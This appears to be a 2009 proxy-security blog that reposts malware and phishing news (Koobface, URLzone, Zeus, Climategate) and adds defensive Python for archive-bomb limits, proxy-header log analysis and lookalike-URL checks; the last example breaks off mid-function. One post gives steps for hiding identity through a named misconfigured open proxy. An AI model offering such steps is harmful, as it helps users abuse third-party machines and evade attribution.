Sophos found that criminal networks of marketing “affiliates” or “partnerka” were driving online shoppers to virtual pharmacies in return for a share of the profits. Investigators believe tens of thousands of fraudsters, mostly based in Russia, are promoting the illegal goods with millions of spam messages and malicious software programmes.
The partnerka operate as well-run businesses. Organisers are known to put on expensive parties for their members, send generous gifts and even run lotteries in which the top producer wins a luxury car.
Sophos’s research discovered that in one of the most well-established affiliate networks operating out of Russia, called Glavmed, affiliate members can make $16,000 a day promoting pharmaceutical websites giving them potential annual earnings of £5.8 million. The criminals can be members of more than one affiliate network and some have boasted of earning more than $100,000 a day. Glavmed is associated with more than 120,000 fake drug websites, the majority branded “Canadian Pharmacy”, taking advantage of Canada’s reputation in the US, the biggest market for online medications, for cheap prescription drugs.
Criminals also infect computers with software that directs those searching for Tamiflu on search engines to the fake sites. Other techniques include inserting spam comments in blogs and on social networks. Those who do order Tamiflu or other drugs from these sites often receive nothing.
However, those who see their orders filled run an additional risk. When security researchers at Cisco’s IronPort ordered pills and had them analysed they found that two thirds of the shipments, which came from India, contained the correct active ingredient but in the wrong dosages, others were placebos. “Consumers take a significant risk of ingesting an uncontrolled substance from overseas distributors,” the researchers said.
The new warning came after hundreds of websites were shut down last week for selling fake or illicit drugs around the world. Interpol and the UK Medicines and Healthcare Products Regulatory Agency co-ordinated raids in 24 countries, confiscating thousands of orders linked to more than 750 illegal websites.
A Department of Health spokesman said: “There is no need to pay for antivirals. They are free on the NHS and being offered to all who need them. Anyone who buys medicines from internet sites could be in danger of receiving counterfeit or substandard medicines.”
• There are more than 200 genuine online pharmacies in Canada, which has a reputation for providing cheap, safe medications. Consumers should only use an online pharmacy if it is licensed, offers security and privacy of information, provides an address and phone number, requires a valid prescription and medical data.
Thursday, December 10, 2009
A Separate AV/Malware Box?
For those admins who are looking to refresh their proxy architecture and are evaluating the various Secure Web Gateway vendors, you may be wondering whether there's a benefit to running the AV (anti-virus) and malware scanning on a separate box. The 600 lb gorilla of the web gateway appliance market, Blue Coat Systems, uses a two-box architecture, while most of its competitors use a single-box design that runs the AV and malware scanning on the same box as the gateway.
What's the advantage of the second box? The big gain is scale and throughput: by offloading scanning to a second box you can handle much higher throughput and many more connections. Even if neither of those is a concern for you, consider what happens when an AV or malware engine goes into a CPU storm, and whether you want that to affect everyone using the web gateway. There are files deliberately crafted to send AV engines into near-infinite processing loops (deeply nested or highly compressible archives are the classic case), and if your AV or malware engine hasn't been tuned to recognise them and bail out, an AV CPU spike turns into web downtime for your end-users unless the scanning runs on its own box.
If web access isn't mission critical to your organization, and you aren't concerned with scale and throughput, a single box solution may be the answer. But before you go that route, make sure you price out the two box solution, and make the right decision based on all the factors and features available to you.
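To make the "tuned to detect these" point concrete, here is an added example (written for this post, not code from Blue Coat or any other gateway vendor) of the resource accounting a scanner needs before it inflates an archive: a nesting-depth limit, a total-expansion budget, and a compression-ratio check done on the zip directory entry before the member is ever decompressed. The limits, the `scan()` function and the test archives are all hypothetical and built in memory; they contain no real malware.

```python
import io
import zipfile

# Hard limits a gateway-side scanner enforces while expanding archives, so a
# crafted file cannot keep the engine busy (and the proxy's users waiting).
# Illustrative values (assumed, not vendor defaults); tune them to your traffic.
MAX_DEPTH = 3                 # archive-inside-archive levels we will open
MAX_TOTAL_BYTES = 5_000_000   # uncompressed bytes across all levels
MAX_RATIO = 100               # uncompressed:compressed ratio that marks a bomb


class ScanLimitExceeded(Exception):
    """Raised as soon as any budget is blown; the file is then blocked."""


def _walk(data: bytes, depth: int, budget: dict) -> None:
    if depth > MAX_DEPTH:
        raise ScanLimitExceeded(f"nesting depth > {MAX_DEPTH}")
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip: nothing further to expand at this level
    for info in zf.infolist():
        budget["members"] += 1
        compressed = max(info.compress_size, 1)
        # Check the declared ratio BEFORE inflating the member.
        if info.file_size / compressed > MAX_RATIO:
            raise ScanLimitExceeded(
                f"{info.filename}: ratio {info.file_size // compressed}:1 exceeds {MAX_RATIO}:1")
        budget["bytes"] += info.file_size
        if budget["bytes"] > MAX_TOTAL_BYTES:
            raise ScanLimitExceeded(f"expanded size exceeds {MAX_TOTAL_BYTES} bytes")
        member = zf.read(info)  # bounded: its size was already charged to the budget
        if info.filename.lower().endswith(".zip"):
            _walk(member, depth + 1, budget)


def scan(data: bytes) -> dict:
    """Return {"verdict": "clean"|"blocked", "reason": str, "members": int, "bytes": int}."""
    budget = {"members": 0, "bytes": 0}
    try:
        _walk(data, 0, budget)
    except ScanLimitExceeded as exc:
        return {"verdict": "blocked", "reason": str(exc), **budget}
    return {"verdict": "clean", "reason": "", **budget}


# --- constructed test files, built in memory; harmless content only ---

def _zip_of(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def make_nested(levels: int) -> bytes:
    """A small text file wrapped in `levels` nested zips."""
    data = _zip_of({"payload.txt": b"hello"})
    for i in range(levels):
        data = _zip_of({f"level{i}.zip": data})
    return data


def make_bomb() -> bytes:
    """1 MiB of zeros deflates to roughly 1 KiB: about a 1000:1 ratio."""
    return _zip_of({"zeros.bin": b"\0" * (1 << 20)})


if __name__ == "__main__":
    for label, blob in [("nested x2", make_nested(2)),
                        ("nested x5", make_nested(5)),
                        ("ratio bomb", make_bomb()),
                        ("plain file", b"not an archive")]:
        print(label, scan(blob))
```

The point of the ordering is that the ratio test reads only the central directory, so a bomb is rejected without spending a single cycle inflating it; the depth and total-size budgets then bound the work for anything that passes. Whether the verdict on a blocked file is "quarantine" or "pass through with a warning" is a policy choice, but either way the engine returns promptly instead of taking the gateway down with it.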
Wednesday, December 9, 2009
Hackers Exploit Tiger Woods Car Accident to Spread Malware
From: http://blogs.pcmag.com/securitywatch/2009/11/hackers_exploit_tiger_woods_ca.php
Unless you've been in a cave or working or something like that, you know that famed golfer Tiger Woods was in a car accident recently. News outlets, respectable and otherwise, have been hard at work filling us in on every available detail, genuine and otherwise, about the incident.
Cybercriminals are not being left out of the act according to security firm Sophos. The threat comes in the form of a web page claiming to have video content related to the accident. If you're a regular reader of this blog, the rest is predictable: Click to play the video and you are taken to another web page which pushes a file (Movie_HD_Plugin_Update.40014.exe) claiming to be a video plug-in necessary to watch the video. Sophos detects it as Troj/Proxy-JN.
Tuesday, December 8, 2009
Cloud security service looks for malware
Webroot Tuesday announced it has extended its cloud-based Web security service, adding a way to filter outbound as well as inbound Web traffic, monitoring for threats in order to detect and block malware such as botnets that have infected computers. 
"We already have inbound filtering and now we're adding outbound," says Brian Czarny, vice president of solutions marketing at Webroot about the Web Security Service that can now monitor for signs of malware-infected corporate computers trying to "call home" for more instructions, a common practice among criminally run botnets. If the cloud-based Webroot service detects malware such as botnet code calling out to get instructions or otherwise perform an activity, it will block that request, though not all traffic on the user's machine. The Webroot service would then notify the systems administrator of the security event via e-mail and the Web-based administrative console where reports can be obtained.
Czarny says there is no additional charge for the outbound monitoring now available through the Webroot Web Security Service, which also includes some basic URL filtering for productivity purposes. The service works by having the corporation proxy its Web traffic through Webroot’s data centers where a variety of security methods can clean malware and ward off phishing attacks.
Webroot is also announcing on Tuesday an in-the-cloud e-mail archiving service that lets customers store e-mail to be searched and retrieved whether from on-site corporate mail servers or Google Apps.
The pricing for the e-mail archiving is $6 per month per user for unlimited storage and retention; the Web Security Service costs $5 per user per month, with discounts based on volume.
Monday, December 7, 2009
Climategate Hack Used Open Proxies
An interesting story about using an open proxy to hack a website...
From: http://erratasec.blogspot.com/2009/11/climate-hack-used-open-proxies.html
More details are emerging about the "Climategate" hack. It appears that the hacker used an "open proxy" in order to hide the origin of the attack. However, the hacker may have made a mistake, and a review of the logs at RealClimate and ClimateAudit may reveal his/her identity.
As this post describes, the hacker made a comment to a ClimateAudit blog post from IP address 82.208.87.170. If we Google that IP address, we see that it is indeed an open proxy. We don't know the hacker's real IP address.
An "open proxy" is a machine that has been misconfigured to forward requests back out to the Internet. Hackers constantly rescan the Internet looking for these open proxies, usually HTTP proxies at ports 80, 8080, and 3127, or SOCKS at port 1080. Hacker websites maintain lists of active misconfigured proxies. When hackers want to be anonymous, they choose one of these proxies at random, they configure their web browser to go through the proxy. In this manner, anything they do appears to come from the proxy's IP address, and not from the hacker's IP address.
You can use this open proxy yourself to hide your identity. In Firefox, go to "Tools", "Options", "Advanced", "Network", "Settings" to open the proxy dialog box. Then do a "Manual proxy configuration", setting the "HTTP Proxy" to 82.208.87.170, and the port to 8080.
After that, you should be able to browse the Internet just fine (albeit slowly). I went to the Google search page, but was redirected to the Russian version. Open proxies are a great way to see how the rest of the world browses the Internet.
However, there is a flaw. Most proxies also forward the original IP address as a separate field in the web request. I set my browser to the above proxy, and looked at the resulting HTTP request headers. I found the proxy added the header "X-Forwarded-For:" with my original IP address.
Most web server logs ignore the "X-Forwarded-For:" header, which means that this information is lost forever. However, if RealClimate or ClimateAudit has some advanced logging enabled, then they might be able to discover the original IP address.
The RealClimate website (which was attacked by the hacker) makes this claim:
The use of a Turkish computer would seem to imply that this upload and hack was not solely a whistleblower act, but one that involved more sophisticated knowledge.
This is not true. Using open proxies requires no sophisticated knowledge at all - as this blog post shows.
So, the timeline appears to be:
• Oct 12: somebody sends the same e-mails to BBC journalist Paul Hudson.
• Nov 12: sometime after this date, the hacker grabs the files and puts them into a ZIP.
• Nov 17 6:20am: Hacker uploads the file to http://www.realclimate.org/FOIA.zip from an IP address "somewhere in Turkey".
• Nov 17 7:24am: Hacker posts a comment to the ClimateAudit blog saying "A miracle just happened" with a link back to the RealClimate ZIP file. Hacker proxied through 82.208.87.170:8080.
• Nov 17 "a few hours later": RealClimate admins discover the hack and remove the file.
• Nov 19: Hacker posts the file to an open FTP server in Russia.
• Nov 19: Hacker posts to the Air Vent blog pointing to the FTP ZIP. Hacker uses proxy 212.116.220.100:443, an open proxy in Saudi Arabia.
RealClimate hasn't said exactly how their website was "hacked into". I'm guessing a PHP bug found by an average webapp scanner. Their Archive page appears broken, giving the following raw PHP code instead. I assume that's where the hacker broke in:
    
UPDATE: Commenters at ClimateAudit point out a simpler explanation of the RealClimate hack: several of the people at CRU post at RealClimate. The hacker could simply have pretended to be one of those people requesting to reset the password, then intercepted the e-mail with the new password. This is a common hack: once you have access to a person's e-mail account, you can probably get the password on every other account (banking, blogging, Facebook, Twitter, etc.) that uses that e-mail address.
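The post above notes that most web server logs discard the "X-Forwarded-For:" header, so the one trace a forwarding proxy leaves is usually lost. The Python below is an added example, not code from the erratasec post or from this blog: it assumes the server was configured to log in Apache combined format with `%{X-Forwarded-For}i` appended as a final quoted field, parses such lines, and separates the connecting (proxy) address from the forwarded chain, keeping only routable, well-formed hops as leads because the header is unauthenticated and can be set by the client itself. The log lines are constructed from RFC 5737 documentation addresses.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache "combined" format with the X-Forwarded-For request header appended as a
# final quoted field, which is what this parser assumes, e.g.:
#   LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{X-Forwarded-For}i\"" xff
# (nginx: append "$http_x_forwarded_for" to log_format). Plain combined lines
# without the extra field still parse but carry nothing to analyse.
LOG_RE = re.compile(
    r'^(?P<remote>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
    r'(?: "(?P<xff>[^"]*)")?\s*$'
)

# Addresses that can only identify a NAT'd LAN or the host itself, never an
# Internet origin. (ipaddress.is_global would also exclude the documentation
# ranges used in the sample below, so the list is kept explicit here.)
NON_ROUTABLE_V4 = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",
)]


@dataclass
class ProxiedRequest:
    time: str
    request: str
    proxy_ip: str            # %h: the address the TCP connection actually came from
    chain: List[str]         # X-Forwarded-For hops as sent, client first
    lead_ip: Optional[str]   # first routable, well-formed hop, or None


def parse_forwarded_chain(value: str) -> List[str]:
    """Split an X-Forwarded-For value into hops; '-' or '' means header absent."""
    if value in ("", "-"):
        return []
    return [hop.strip() for hop in value.split(",") if hop.strip()]


def is_routable(addr) -> bool:
    if addr.version == 6:
        return addr.is_global
    return not any(addr in net for net in NON_ROUTABLE_V4)


def first_routable_hop(chain: List[str]) -> Optional[str]:
    """Return the first hop that parses as a routable IP address, if any.
    The header is written by the proxy, or by the client itself, with no
    authentication, so a value here is a lead to corroborate, not proof."""
    for hop in chain:
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            continue  # hostname or junk: skip it
        if is_routable(addr):
            return str(addr)
    return None


def find_proxied_requests(lines) -> List[ProxiedRequest]:
    """Return one ProxiedRequest per log line whose X-Forwarded-For header
    names a hop other than the connecting address."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("xff") is None:
            continue
        chain = parse_forwarded_chain(m.group("xff"))
        if not chain or chain == [m.group("remote")]:
            continue
        hits.append(ProxiedRequest(
            time=m.group("time"), request=m.group("request"),
            proxy_ip=m.group("remote"), chain=chain,
            lead_ip=first_routable_hop(chain),
        ))
    return hits


# Constructed sample lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    # direct visit: header absent, logged as "-"
    '203.0.113.5 - - [17/Nov/2009:06:20:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    # through a forwarding proxy that appended the client's public address
    '198.51.100.20 - - [17/Nov/2009:07:24:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0" "203.0.113.77"',
    # client behind NAT: first hop is private, a second proxy added a public hop
    '198.51.100.21 - - [17/Nov/2009:07:25:00 +0000] "GET /FOIA.zip HTTP/1.1" 200 61440 "-" "Mozilla/5.0" "10.0.0.8, 203.0.113.90"',
    # older log format with no header field: nothing to analyse
    '198.51.100.22 - - [17/Nov/2009:07:26:00 +0000] "GET / HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    # header present but not an address (it is client-controlled, so this happens)
    '198.51.100.23 - - [17/Nov/2009:07:27:00 +0000] "GET / HTTP/1.1" 200 100 "-" "curl/7.19" "not-an-ip"',
]

if __name__ == "__main__":
    for hit in find_proxied_requests(SAMPLE_LOG):
        print(f"{hit.time}  via {hit.proxy_ip:<15}  chain={hit.chain}  lead={hit.lead_ip}")
```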
Friday, December 4, 2009
The Latest in Trojan Attacks
From http://www.webhostingfan.com/2009/12/the-latest-in-trojan-attacks/
Just when it seems as though malware and Trojan attacks could not get much worse, along comes yet another to toss a monkey wrench into the works. The latest Trojan horse program to be released on the Web is the URLzone Trojan that attacks banks.
Is that your bank?
The URLzone Trojan horse program was discovered by Finjan Software at the end of September, 2009 and has been reported as being extremely advanced. The program rewrites bank pages in such a way that unsuspecting victims have no idea that their bank accounts are being emptied. With an integrated command-and-control interface, nefarious types can set specific amounts they would like to remove from their victims' accounts.
Slippery little bugger
Not only has this bit of malicious coding gathered the interest of Finjan, but RSA Security has been tracking and researching URLzone. Thus far the Trojan horse program has proven to be a bit of a slippery one to catch. The malware uses several techniques to peg machines being used by law enforcement and investigators in attempts to catch URLzone. The one good thing to come of this is that the creators of the program know they are now being watched and are reacting.
Just how slippery is this Trojan? Once it has detected it is being monitored, it continues to force a money transfer. Instead of using one of its own people, it grabs a legitimate and innocent victim who has been part of legal money transfers in the past and makes it appear as though that person is generating the transaction. The end result is a bunch of very confused investigators.
To date, over 400 unsuspecting accounts have been used as mules, over 6,400 computers have been infected with URLzone, and the total amount cleared on a daily basis has been in excess of $17,500.
How does it work?
How does URLzone work its way onto unsuspecting computers? Once the malware executes, a copy is made of itself to c:\uninstall02.exe. An ID is created and this is sent along with a version ID of URLzone to the command-and-control interface. This effectively sends a confirmation that the machine in question is now infected with the Trojan. The command-and-control interface then logs the information, downloads a new executable, and copies itself to the SYSTEM32 directory with a random and hidden name. The program does not change any existing system files and needs to add itself to the startup registry each time the machine in question is rebooted.
At this point, URLzone hooks itself to the svchost.exe process and quietly checks with the command-and-control interface for new updates and commands while simultaneously watching for web browsers to open. Once a web browser is opened, the Trojan horse program goes to work and the unsuspecting computer user is completely unaware anything is happening.
Final Thoughts
All in all, the URLzone Trojan horse program is one nasty piece of work. The best defense any computer user can take is ensuring that their operating system is up to date with the latest security updates and their anti-virus protection software has been recently updated with all the latest information.
Once again, you should also make sure you're protecting your end-users from browsing malware sites, and your proxy is scanning for malware, with the latest anti-malware updates.
Thursday, December 3, 2009
Koobface using new tricks to infect this holiday season
The criminals behind Koobface are gearing up for some malicious holiday fun according to reports from Websense and McAfee. The malware, which has been seen online in various formats for a while now, is using Google Reader to spread itself and offers a few other tricks this time around.
First detected in December last year (with a more powerful version emerging in March of this year), the Koobface worm targets users of social networking sites like Facebook, MySpace, Twitter and most recently Skype. In recent days the security industry has noted increased activity of the Koobface attack, which spreads by delivering messages to people who are ‘friends’ of social network users whose computers have already been infected by the worm.
McAfee is warning about a version of a Koobface run that mirrors the report from Websense that The Tech Herald received recently. Both vendors are seeing attacks from the malware that link up to a “video” of a cute little baby dressed up as Santa. The tiny tyke has no idea his image is being used to spread malware, but anyone who attempts to load the video (named SantA in some cases) is sent a message that they need to load a codec to play the movie. However, as in previous Koobface attacks, the codec is malicious and does nothing but infect the system.
Moreover, McAfee notes that some of the attacks will push users to another site when they attempt to watch the movie when it appears in Google Reader as a link. This secondary site is made up to look like a Facebook page that ironically warns users about Koobface and offers a link to download a virus scanner. This scanner is the malware delivery method, and once downloaded and installed, more malicious files are sent to the infected system.
In addition to the false Facebook page, McAfee noted that infected users will be lured into cracking CAPTCHA codes so that those behind Koobface can register more junk Facebook profiles. The CAPTCHA trick will appear as a Windows warning that the system will be shut down unless they enter the CAPTCHA code displayed. If the shutdown timer hits zero, the system is locked until the code is entered. Once entered, the code is sent to a server where the information is later used for account creation.
In the past, The Tech Herald has talked about malicious wall posts on Facebook thanks to Koobface, and this latest wave of attacks appears to us to be an attempt to further the reach of those posts. More information on those attacks can be accessed here.
Websense, adding to the attack information, reports that there is a social engineering tactic being used, where the periods in the malicious URL are replaced by commas. Speculating, Websense said that the commas are used in the hope that the user will copy and paste the URL into their browser and replace them with the correct character, thinking that the friend who sent them made a mistake when entering the URL information.
Both vendors expressed the need for users to use caution when they see random Facebook wall posts, and that they should not download files from untrusted sources. In addition to that advice, we’ve noticed that some of the false video pages misspell the “You” in YouTube, which is a clear sign something is wrong, aside from the fact the video isn’t being hosted on YouTube itself.
And of course, if you haven't already, you should consider putting a proxy into your network to help protect end-users from malware and spyware.
Wednesday, December 2, 2009
New malware scam targets Twilight fans
PC Tools' Malware Research Center is warning web users of another online scam that hopes to piggyback on hype surrounding the new Twilight New Moon film. 
The security software developer says the latest trick tempts movie fans by promising them they can watch the film for free, before installing malware on their computer.
PC Tools said fans are baited with text on websites, in chat rooms and on blogs that reads: 'Watch New Moon Full Movie.'
Meanwhile, comment posts are filled with related keywords to attract search engines. Then, when fans search for the film they find links to stolen images from the movie itself, convincing the fan the movie is only one click away.
However, after clicking on the 'movie player', users are told to run a 'streamviewer' which installs malware on their computers.
This is the second malware scam targeting Twilight New Moon in a week. Last week, PC Tools warned that malicious websites that claim to feature interviews with the author of the books, Stephenie Meyer, were ranking high in a number of search engines.
Instead of providing a video clip of Meyer, those visiting the site were directed to a window informing them they were infected with malware and then encouraged to download an antivirus solution to clean their PC.
This latest malware scam is a good reminder to have security for end-users via a proxy architecture, and the latest anti-malware installed on your proxy.
Monday, November 23, 2009
ICSA Labs Study Finds Majority of Security Products Do Not Perform as Intended
ICSA labs released the Product Assurance Report white paper (pdf) earlier this week and sparked a wave of blog posts and comments about the quality of security products.  There were some rather eye-opening results included in the paper.  The report findings indicated that some vendors and enterprise users consider logging a nuisance and merely a “box to check.”  According to the report, logging is a particular challenge for firewalls.  Almost every network firewall (97 percent) or Web application firewall (80 percent) tested experienced at least one logging problem.
Dozens of vendors have certified network and Web Application firewall products. In order to attain ICSA Labs Certified status, web application firewall products must pass a rigorous set of functional, performance and platform security requirements. Candidate web application firewall products must completely satisfy the entire set of baseline requirements. Only products that passed all the tests are certified.
The comprehensive list of specifications is created by a consortium of vendors and the ICSA. Here's what ICSA advised enterprise companies before purchasing and using security products:
* Demand quality.
* Be suspicious of performance claims and numbers. Vet them. Question them. Be an educated, cautious buyer.
* Choose more established products over new.
* Choose simplicity over complexity.
* Use certified products!
* Prefer vendors that certify their products, and that participate in industry and ICSA Labs consortia and other standards bodies.
This report helps to prove that certified products have higher quality and also shows the importance of certified products for the enterprise. It's a good reason to make sure your proxy is ICSA Labs certified.
Thursday, November 19, 2009
Crime breaks barriers
We've talked about the fact that the motivation behind hackers has changed in recent years.  Hackers do it for the money nowadays.  Crime on the internet pays. 
From a news article on the topic:
A recent study by TrendMicro reveals that Google Trends, a public web facility of Google, which shows how a particular search term is relative to the total search volume has been used by cyber criminals to find the most popular search terms. They then use these terms to point to links to their malicious sites, allowing them to victimize more people. Clearly, cyber crooks seem to be keeping up with the most recent technological advancements, using newly released applications to profit as much as possible.
Apart from poisoning the top search results, cyber criminals have been found to use GeoIP tracking as a social engineering tactic. This helps the bad guys to identify the geographical location of an internet-connected computer, mobile device, or website visitor. Geolocation data can include information such as country, region, city, postal/zip code, latitude, longitude and time zone.
Using geolocation data, cyber criminals can customize spammed emails and URLs to fool users into thinking that these are from non-malicious sources. This increases the possibility of malicious emails spreading, even while users unsuspectingly click on these links.
Says Abhinav Karnwal, product marketing manager, Trend Micro: “Malicious websites are making around $10,000 every day. It all starts with a pop-up showing a problem in your computer. The user would go to the internet and look for an anti-virus (AV) software. These malicious sites feign the look and feel of an authentic anti-virus company. The site would run a scan on your computer and show multiple errors, which doesn’t actually exist in reality. It would ask the user to pay a certain amount and download the AV file. After payment, the fake AV programme would indicate that your computer is free from errors, which never existed anyway.”
While these scams and the money aspect aren't news, it's a good reminder why we have proxies in place to secure our organizations' access to the internet. The article also provides some good reminders:
The team says, “Although ‘classic’ techniques are relatively well-known, cyber criminals are becoming cleverer. Users need to be educated to stop clicking on links in emails from unknown senders. If it is sent from a friend or colleague, it should be double-checked with the sender. Users should always be suspicious of any site with an unknown domain that contains the name of a well-known site in the latter part of the web address.”
The biggest threat now facing users may no longer be phishing—or accessing passwords. At least three quarters of malicious content is contained in legitimate sites. ... Almost 70 per cent of the top 100 most popular websites either hosted malicious content or contained a ‘masked redirect’ to lure unsuspecting victims from legitimate sites to malicious sites.
“In essence, the only way to be secure against the threat landscape is to ensure that a powerful security solution is in place which can provide real-time protection,” the UK team said. It is still a cops and robbers game. And there are too many robbers out there.
We've talked in the past here about real-time protection on your proxy. Since user education can only go so far, making sure your proxy has the capability to do real-time rating is more important than ever coupled with malware scanning capability.
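The advice in the quote above, that a well-known name showing up late in a web address is a warning sign, is easy to turn into a gateway check. The following is an added Python example, not from the article or from any vendor product: it flags URLs in which a known brand appears in the hostname's labels, or as a domain-like token in the path, while the registrable domain belongs to someone else. The brand list and the small two-level-suffix table are assumptions for illustration; a production version would use the Public Suffix List, and would still miss digit-substitution and homoglyph tricks.

```python
from urllib.parse import urlsplit

# Brands users are expected to trust (constructed list for this example).
KNOWN_BRANDS = ("ebay", "google", "nacha", "paypal")

# Registrable-domain approximation: the last two labels, or three when the
# last two form a common two-level public suffix. Constructed subset; a real
# gateway would use the full Public Suffix List.
TWO_LEVEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}


def registrable_domain(host):
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def brand_lookalike(url):
    """Return the brand a URL appears to impersonate, or None.

    Suspicious: a known brand occurs inside one of the hostname's labels
    (paypal.com.secure-login.net, secure-paypal-login.net) or as a
    domain-like token in the path (evil.example/paypal.com/...), but the
    registrable domain itself is not that brand's.
    """
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not host:
        return None
    owner = registrable_domain(host).split(".")[0]
    if owner in KNOWN_BRANDS:
        return None  # the brand's own registrable domain
    host_labels = host.split(".")
    path = parts.path.lower()
    for brand in KNOWN_BRANDS:
        if any(brand in label for label in host_labels) or (brand + ".") in path:
            return brand
    return None
```

A hit is a reason to rate the URL down or block it; a miss says nothing, since the same phish can just as well live on a domain that never mentions the brand.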
Wednesday, November 18, 2009
Top 10 issues overloading IT managers
It only gets an honorable mention, but Web management was discussed on this recent list of the top 10 issues overloading IT managers. Web management means watching what employees are doing on the internet. It is one of those tasks that IT managers are increasingly called on to do, and one that most dislike doing.
IT Managers are increasingly overloaded these days and the common view is that they have more than enough on their plate without playing censor to an entire company. Yes, if someone's spending all their time looking at porn on the internet that's an issue for a company, but the prevailing view is that it's a problem in management, not in IT.
The only time the IT department should get involved is after a complaint, either from someone on the floor who's spotted what's going on or from a manager who's concerned about lost productivity.
As the article says:
The tasks of monitoring and managing web access has only become more difficult as interest in new web services has grown. Now, sites such as Twitter and Facebook aren't purely for consumers, and many companies also make use of them for promotion and customer relations.
This means that simply blocking everyone from these services is no longer possible, as they have become work tools.
At the same time, more and more new sites are popping up, more blogging platforms, social networks and casual gaming portals are emerging every day, making it far more difficult to keep up with what can and can't be blocked.
Then, on top of it all, there are the ever-growing ranks of malware infections and phishing scams connected to web applications and tools, making the risk of security breaches through the browser stronger than ever.
As such, the task of web management at the corporate level is becoming more complex and crucial at a most inopportune time.
There's definitely a need for tools like proxies to help in this new/old IT task.
Tuesday, November 17, 2009
Are companies blocking more social networking site?
There are a lot more articles and discussions about social networking lately, and about its prevalence and use in the workplace. A couple of years ago it would have been easy to say that social networking sites such as Facebook, MySpace and Twitter had no place in the workplace, and the decision was easy for IT administrators: block access to these sites from the corporate network.
The Guardian said last week that after-work life is rapidly disappearing and being replaced by non-working life. Because of this there's a belief that the transparency about people's private lives brought by new media such as Twitter and Facebook will make employers more tolerant of social networking, or make employees better behaved on these sites.
“The business use case in Twitter is turning out to be very important,” Twitter co-founder Biz Stone said last week as the company announced the possibility of cross-posting tweets to the professional network LinkedIn.
But you should still be concerned about crossing the line between business and personal use of social networking. For example, you'll probably want to think twice about tweeting that you hate your new job but are grateful for the fat pay check.
While some companies still allow social networking use in the workplace, a recent analysis of more than a billion Web requests processed by ScanSafe each month showed a 20 per cent increase in the number of customers blocking social networking sites in the last six months.
Currently, 76 per cent of companies are choosing to block social networking and it is now a more popular category to block than online shopping (52 per cent), weapons (75 per cent), alcohol (64 per cent), sports (51 per cent) and Web mail (58 per cent).
Blocking social networking is still an option for any IT administrator, or at least tracking who uses it. But it's definitely something that's going to remain in the news for some time to come.
Monday, November 16, 2009
Spam targets financial transfers
In news that shows yet another link between malicious web pages and spam, and that is definitely relevant to the fight against malware, viruses and hackers, the latest report is of a spam attack targeting a financial transfer system that handles trillions of dollars in transactions annually. Not surprisingly, it turns out to be yet another case of fake emails.
The spam messages pretend to come from the National Automated Clearing House Association (NACHA), a U.S. nonprofit association that oversees the Automated Clearing House system (ACH). ACH is a system widely used by financial institutions for exchanging details of direct deposits, checks and cash transfers.
It appears that in the last few months, numerous businesses have lost money through ACH fraud. It happens when the hackers obtain the authentication credentials required to transfer money. Although NACHA has no direct involvement in the processing of the payments, spammers have launched a campaign with messages purporting to be from the organization saying that an ACH payment has been rejected.
The spam messages have a link to a fake website that looks like NACHA's. The site asks the victim to download a PDF file, but it is actually an executable. If launched, the file will install Zbot, also known as Zeus, an advanced piece of banking malware that can harvest the authentication details required to initiate an ACH transaction.
NACHA has put an advisory on its website, warning: "NACHA does not send communications to individuals or organizations about individual ACH transactions that they originate or receive."
With this kind of sophisticated trickery, the question becomes: How do you stop it? For starters, make sure you publicize the scheme and keep ACH clients well-trained to refuse emails even if they look real. And of course, make sure your proxy system is up to date with the latest anti-malware, URL database and real-time rating system.
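The lure described above, a download offered as a PDF that is really an executable, is exactly the kind of thing a proxy or mail gateway should catch by looking at content rather than file name. The following is an added Python example, not from NACHA, the reporting article or any vendor product: it identifies the real format of a download from its leading bytes, confirms a Windows executable by following the `e_lfanew` pointer at offset 0x3C to the `PE\0\0` signature, and blocks executables outright or any file whose extension disagrees with its content. The sample files are constructed inline (the "PE" is a bare header, not a program), and the magic-number table is a small illustrative subset.

```python
import struct

# Leading-byte signatures for formats a download gateway must tell apart.
# Constructed subset for this example; extend as needed.
MAGIC = (
    (b"%PDF-", "pdf"),
    (b"MZ", "exe"),          # DOS stub; may be a PE, checked further below
    (b"\x7fELF", "elf"),
    (b"PK\x03\x04", "zip"),  # also docx/xlsx/jar containers
)
EXECUTABLE_TYPES = {"exe", "pe", "elf"}
# What each claimed extension should really contain.
EXPECTED_BY_EXT = {"pdf": "pdf", "zip": "zip", "docx": "zip", "xlsx": "zip", "jar": "zip"}


def sniff_type(data):
    """Name the format from the leading bytes, ignoring the file name entirely."""
    for prefix, name in MAGIC:
        if data.startswith(prefix):
            return name
    return "unknown"


def is_pe(data):
    """True for a Windows PE image: 'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def download_verdict(filename, data):
    """Return (action, detected_type, reason) for a download."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    actual = sniff_type(data)
    if actual == "exe" and is_pe(data):
        actual = "pe"
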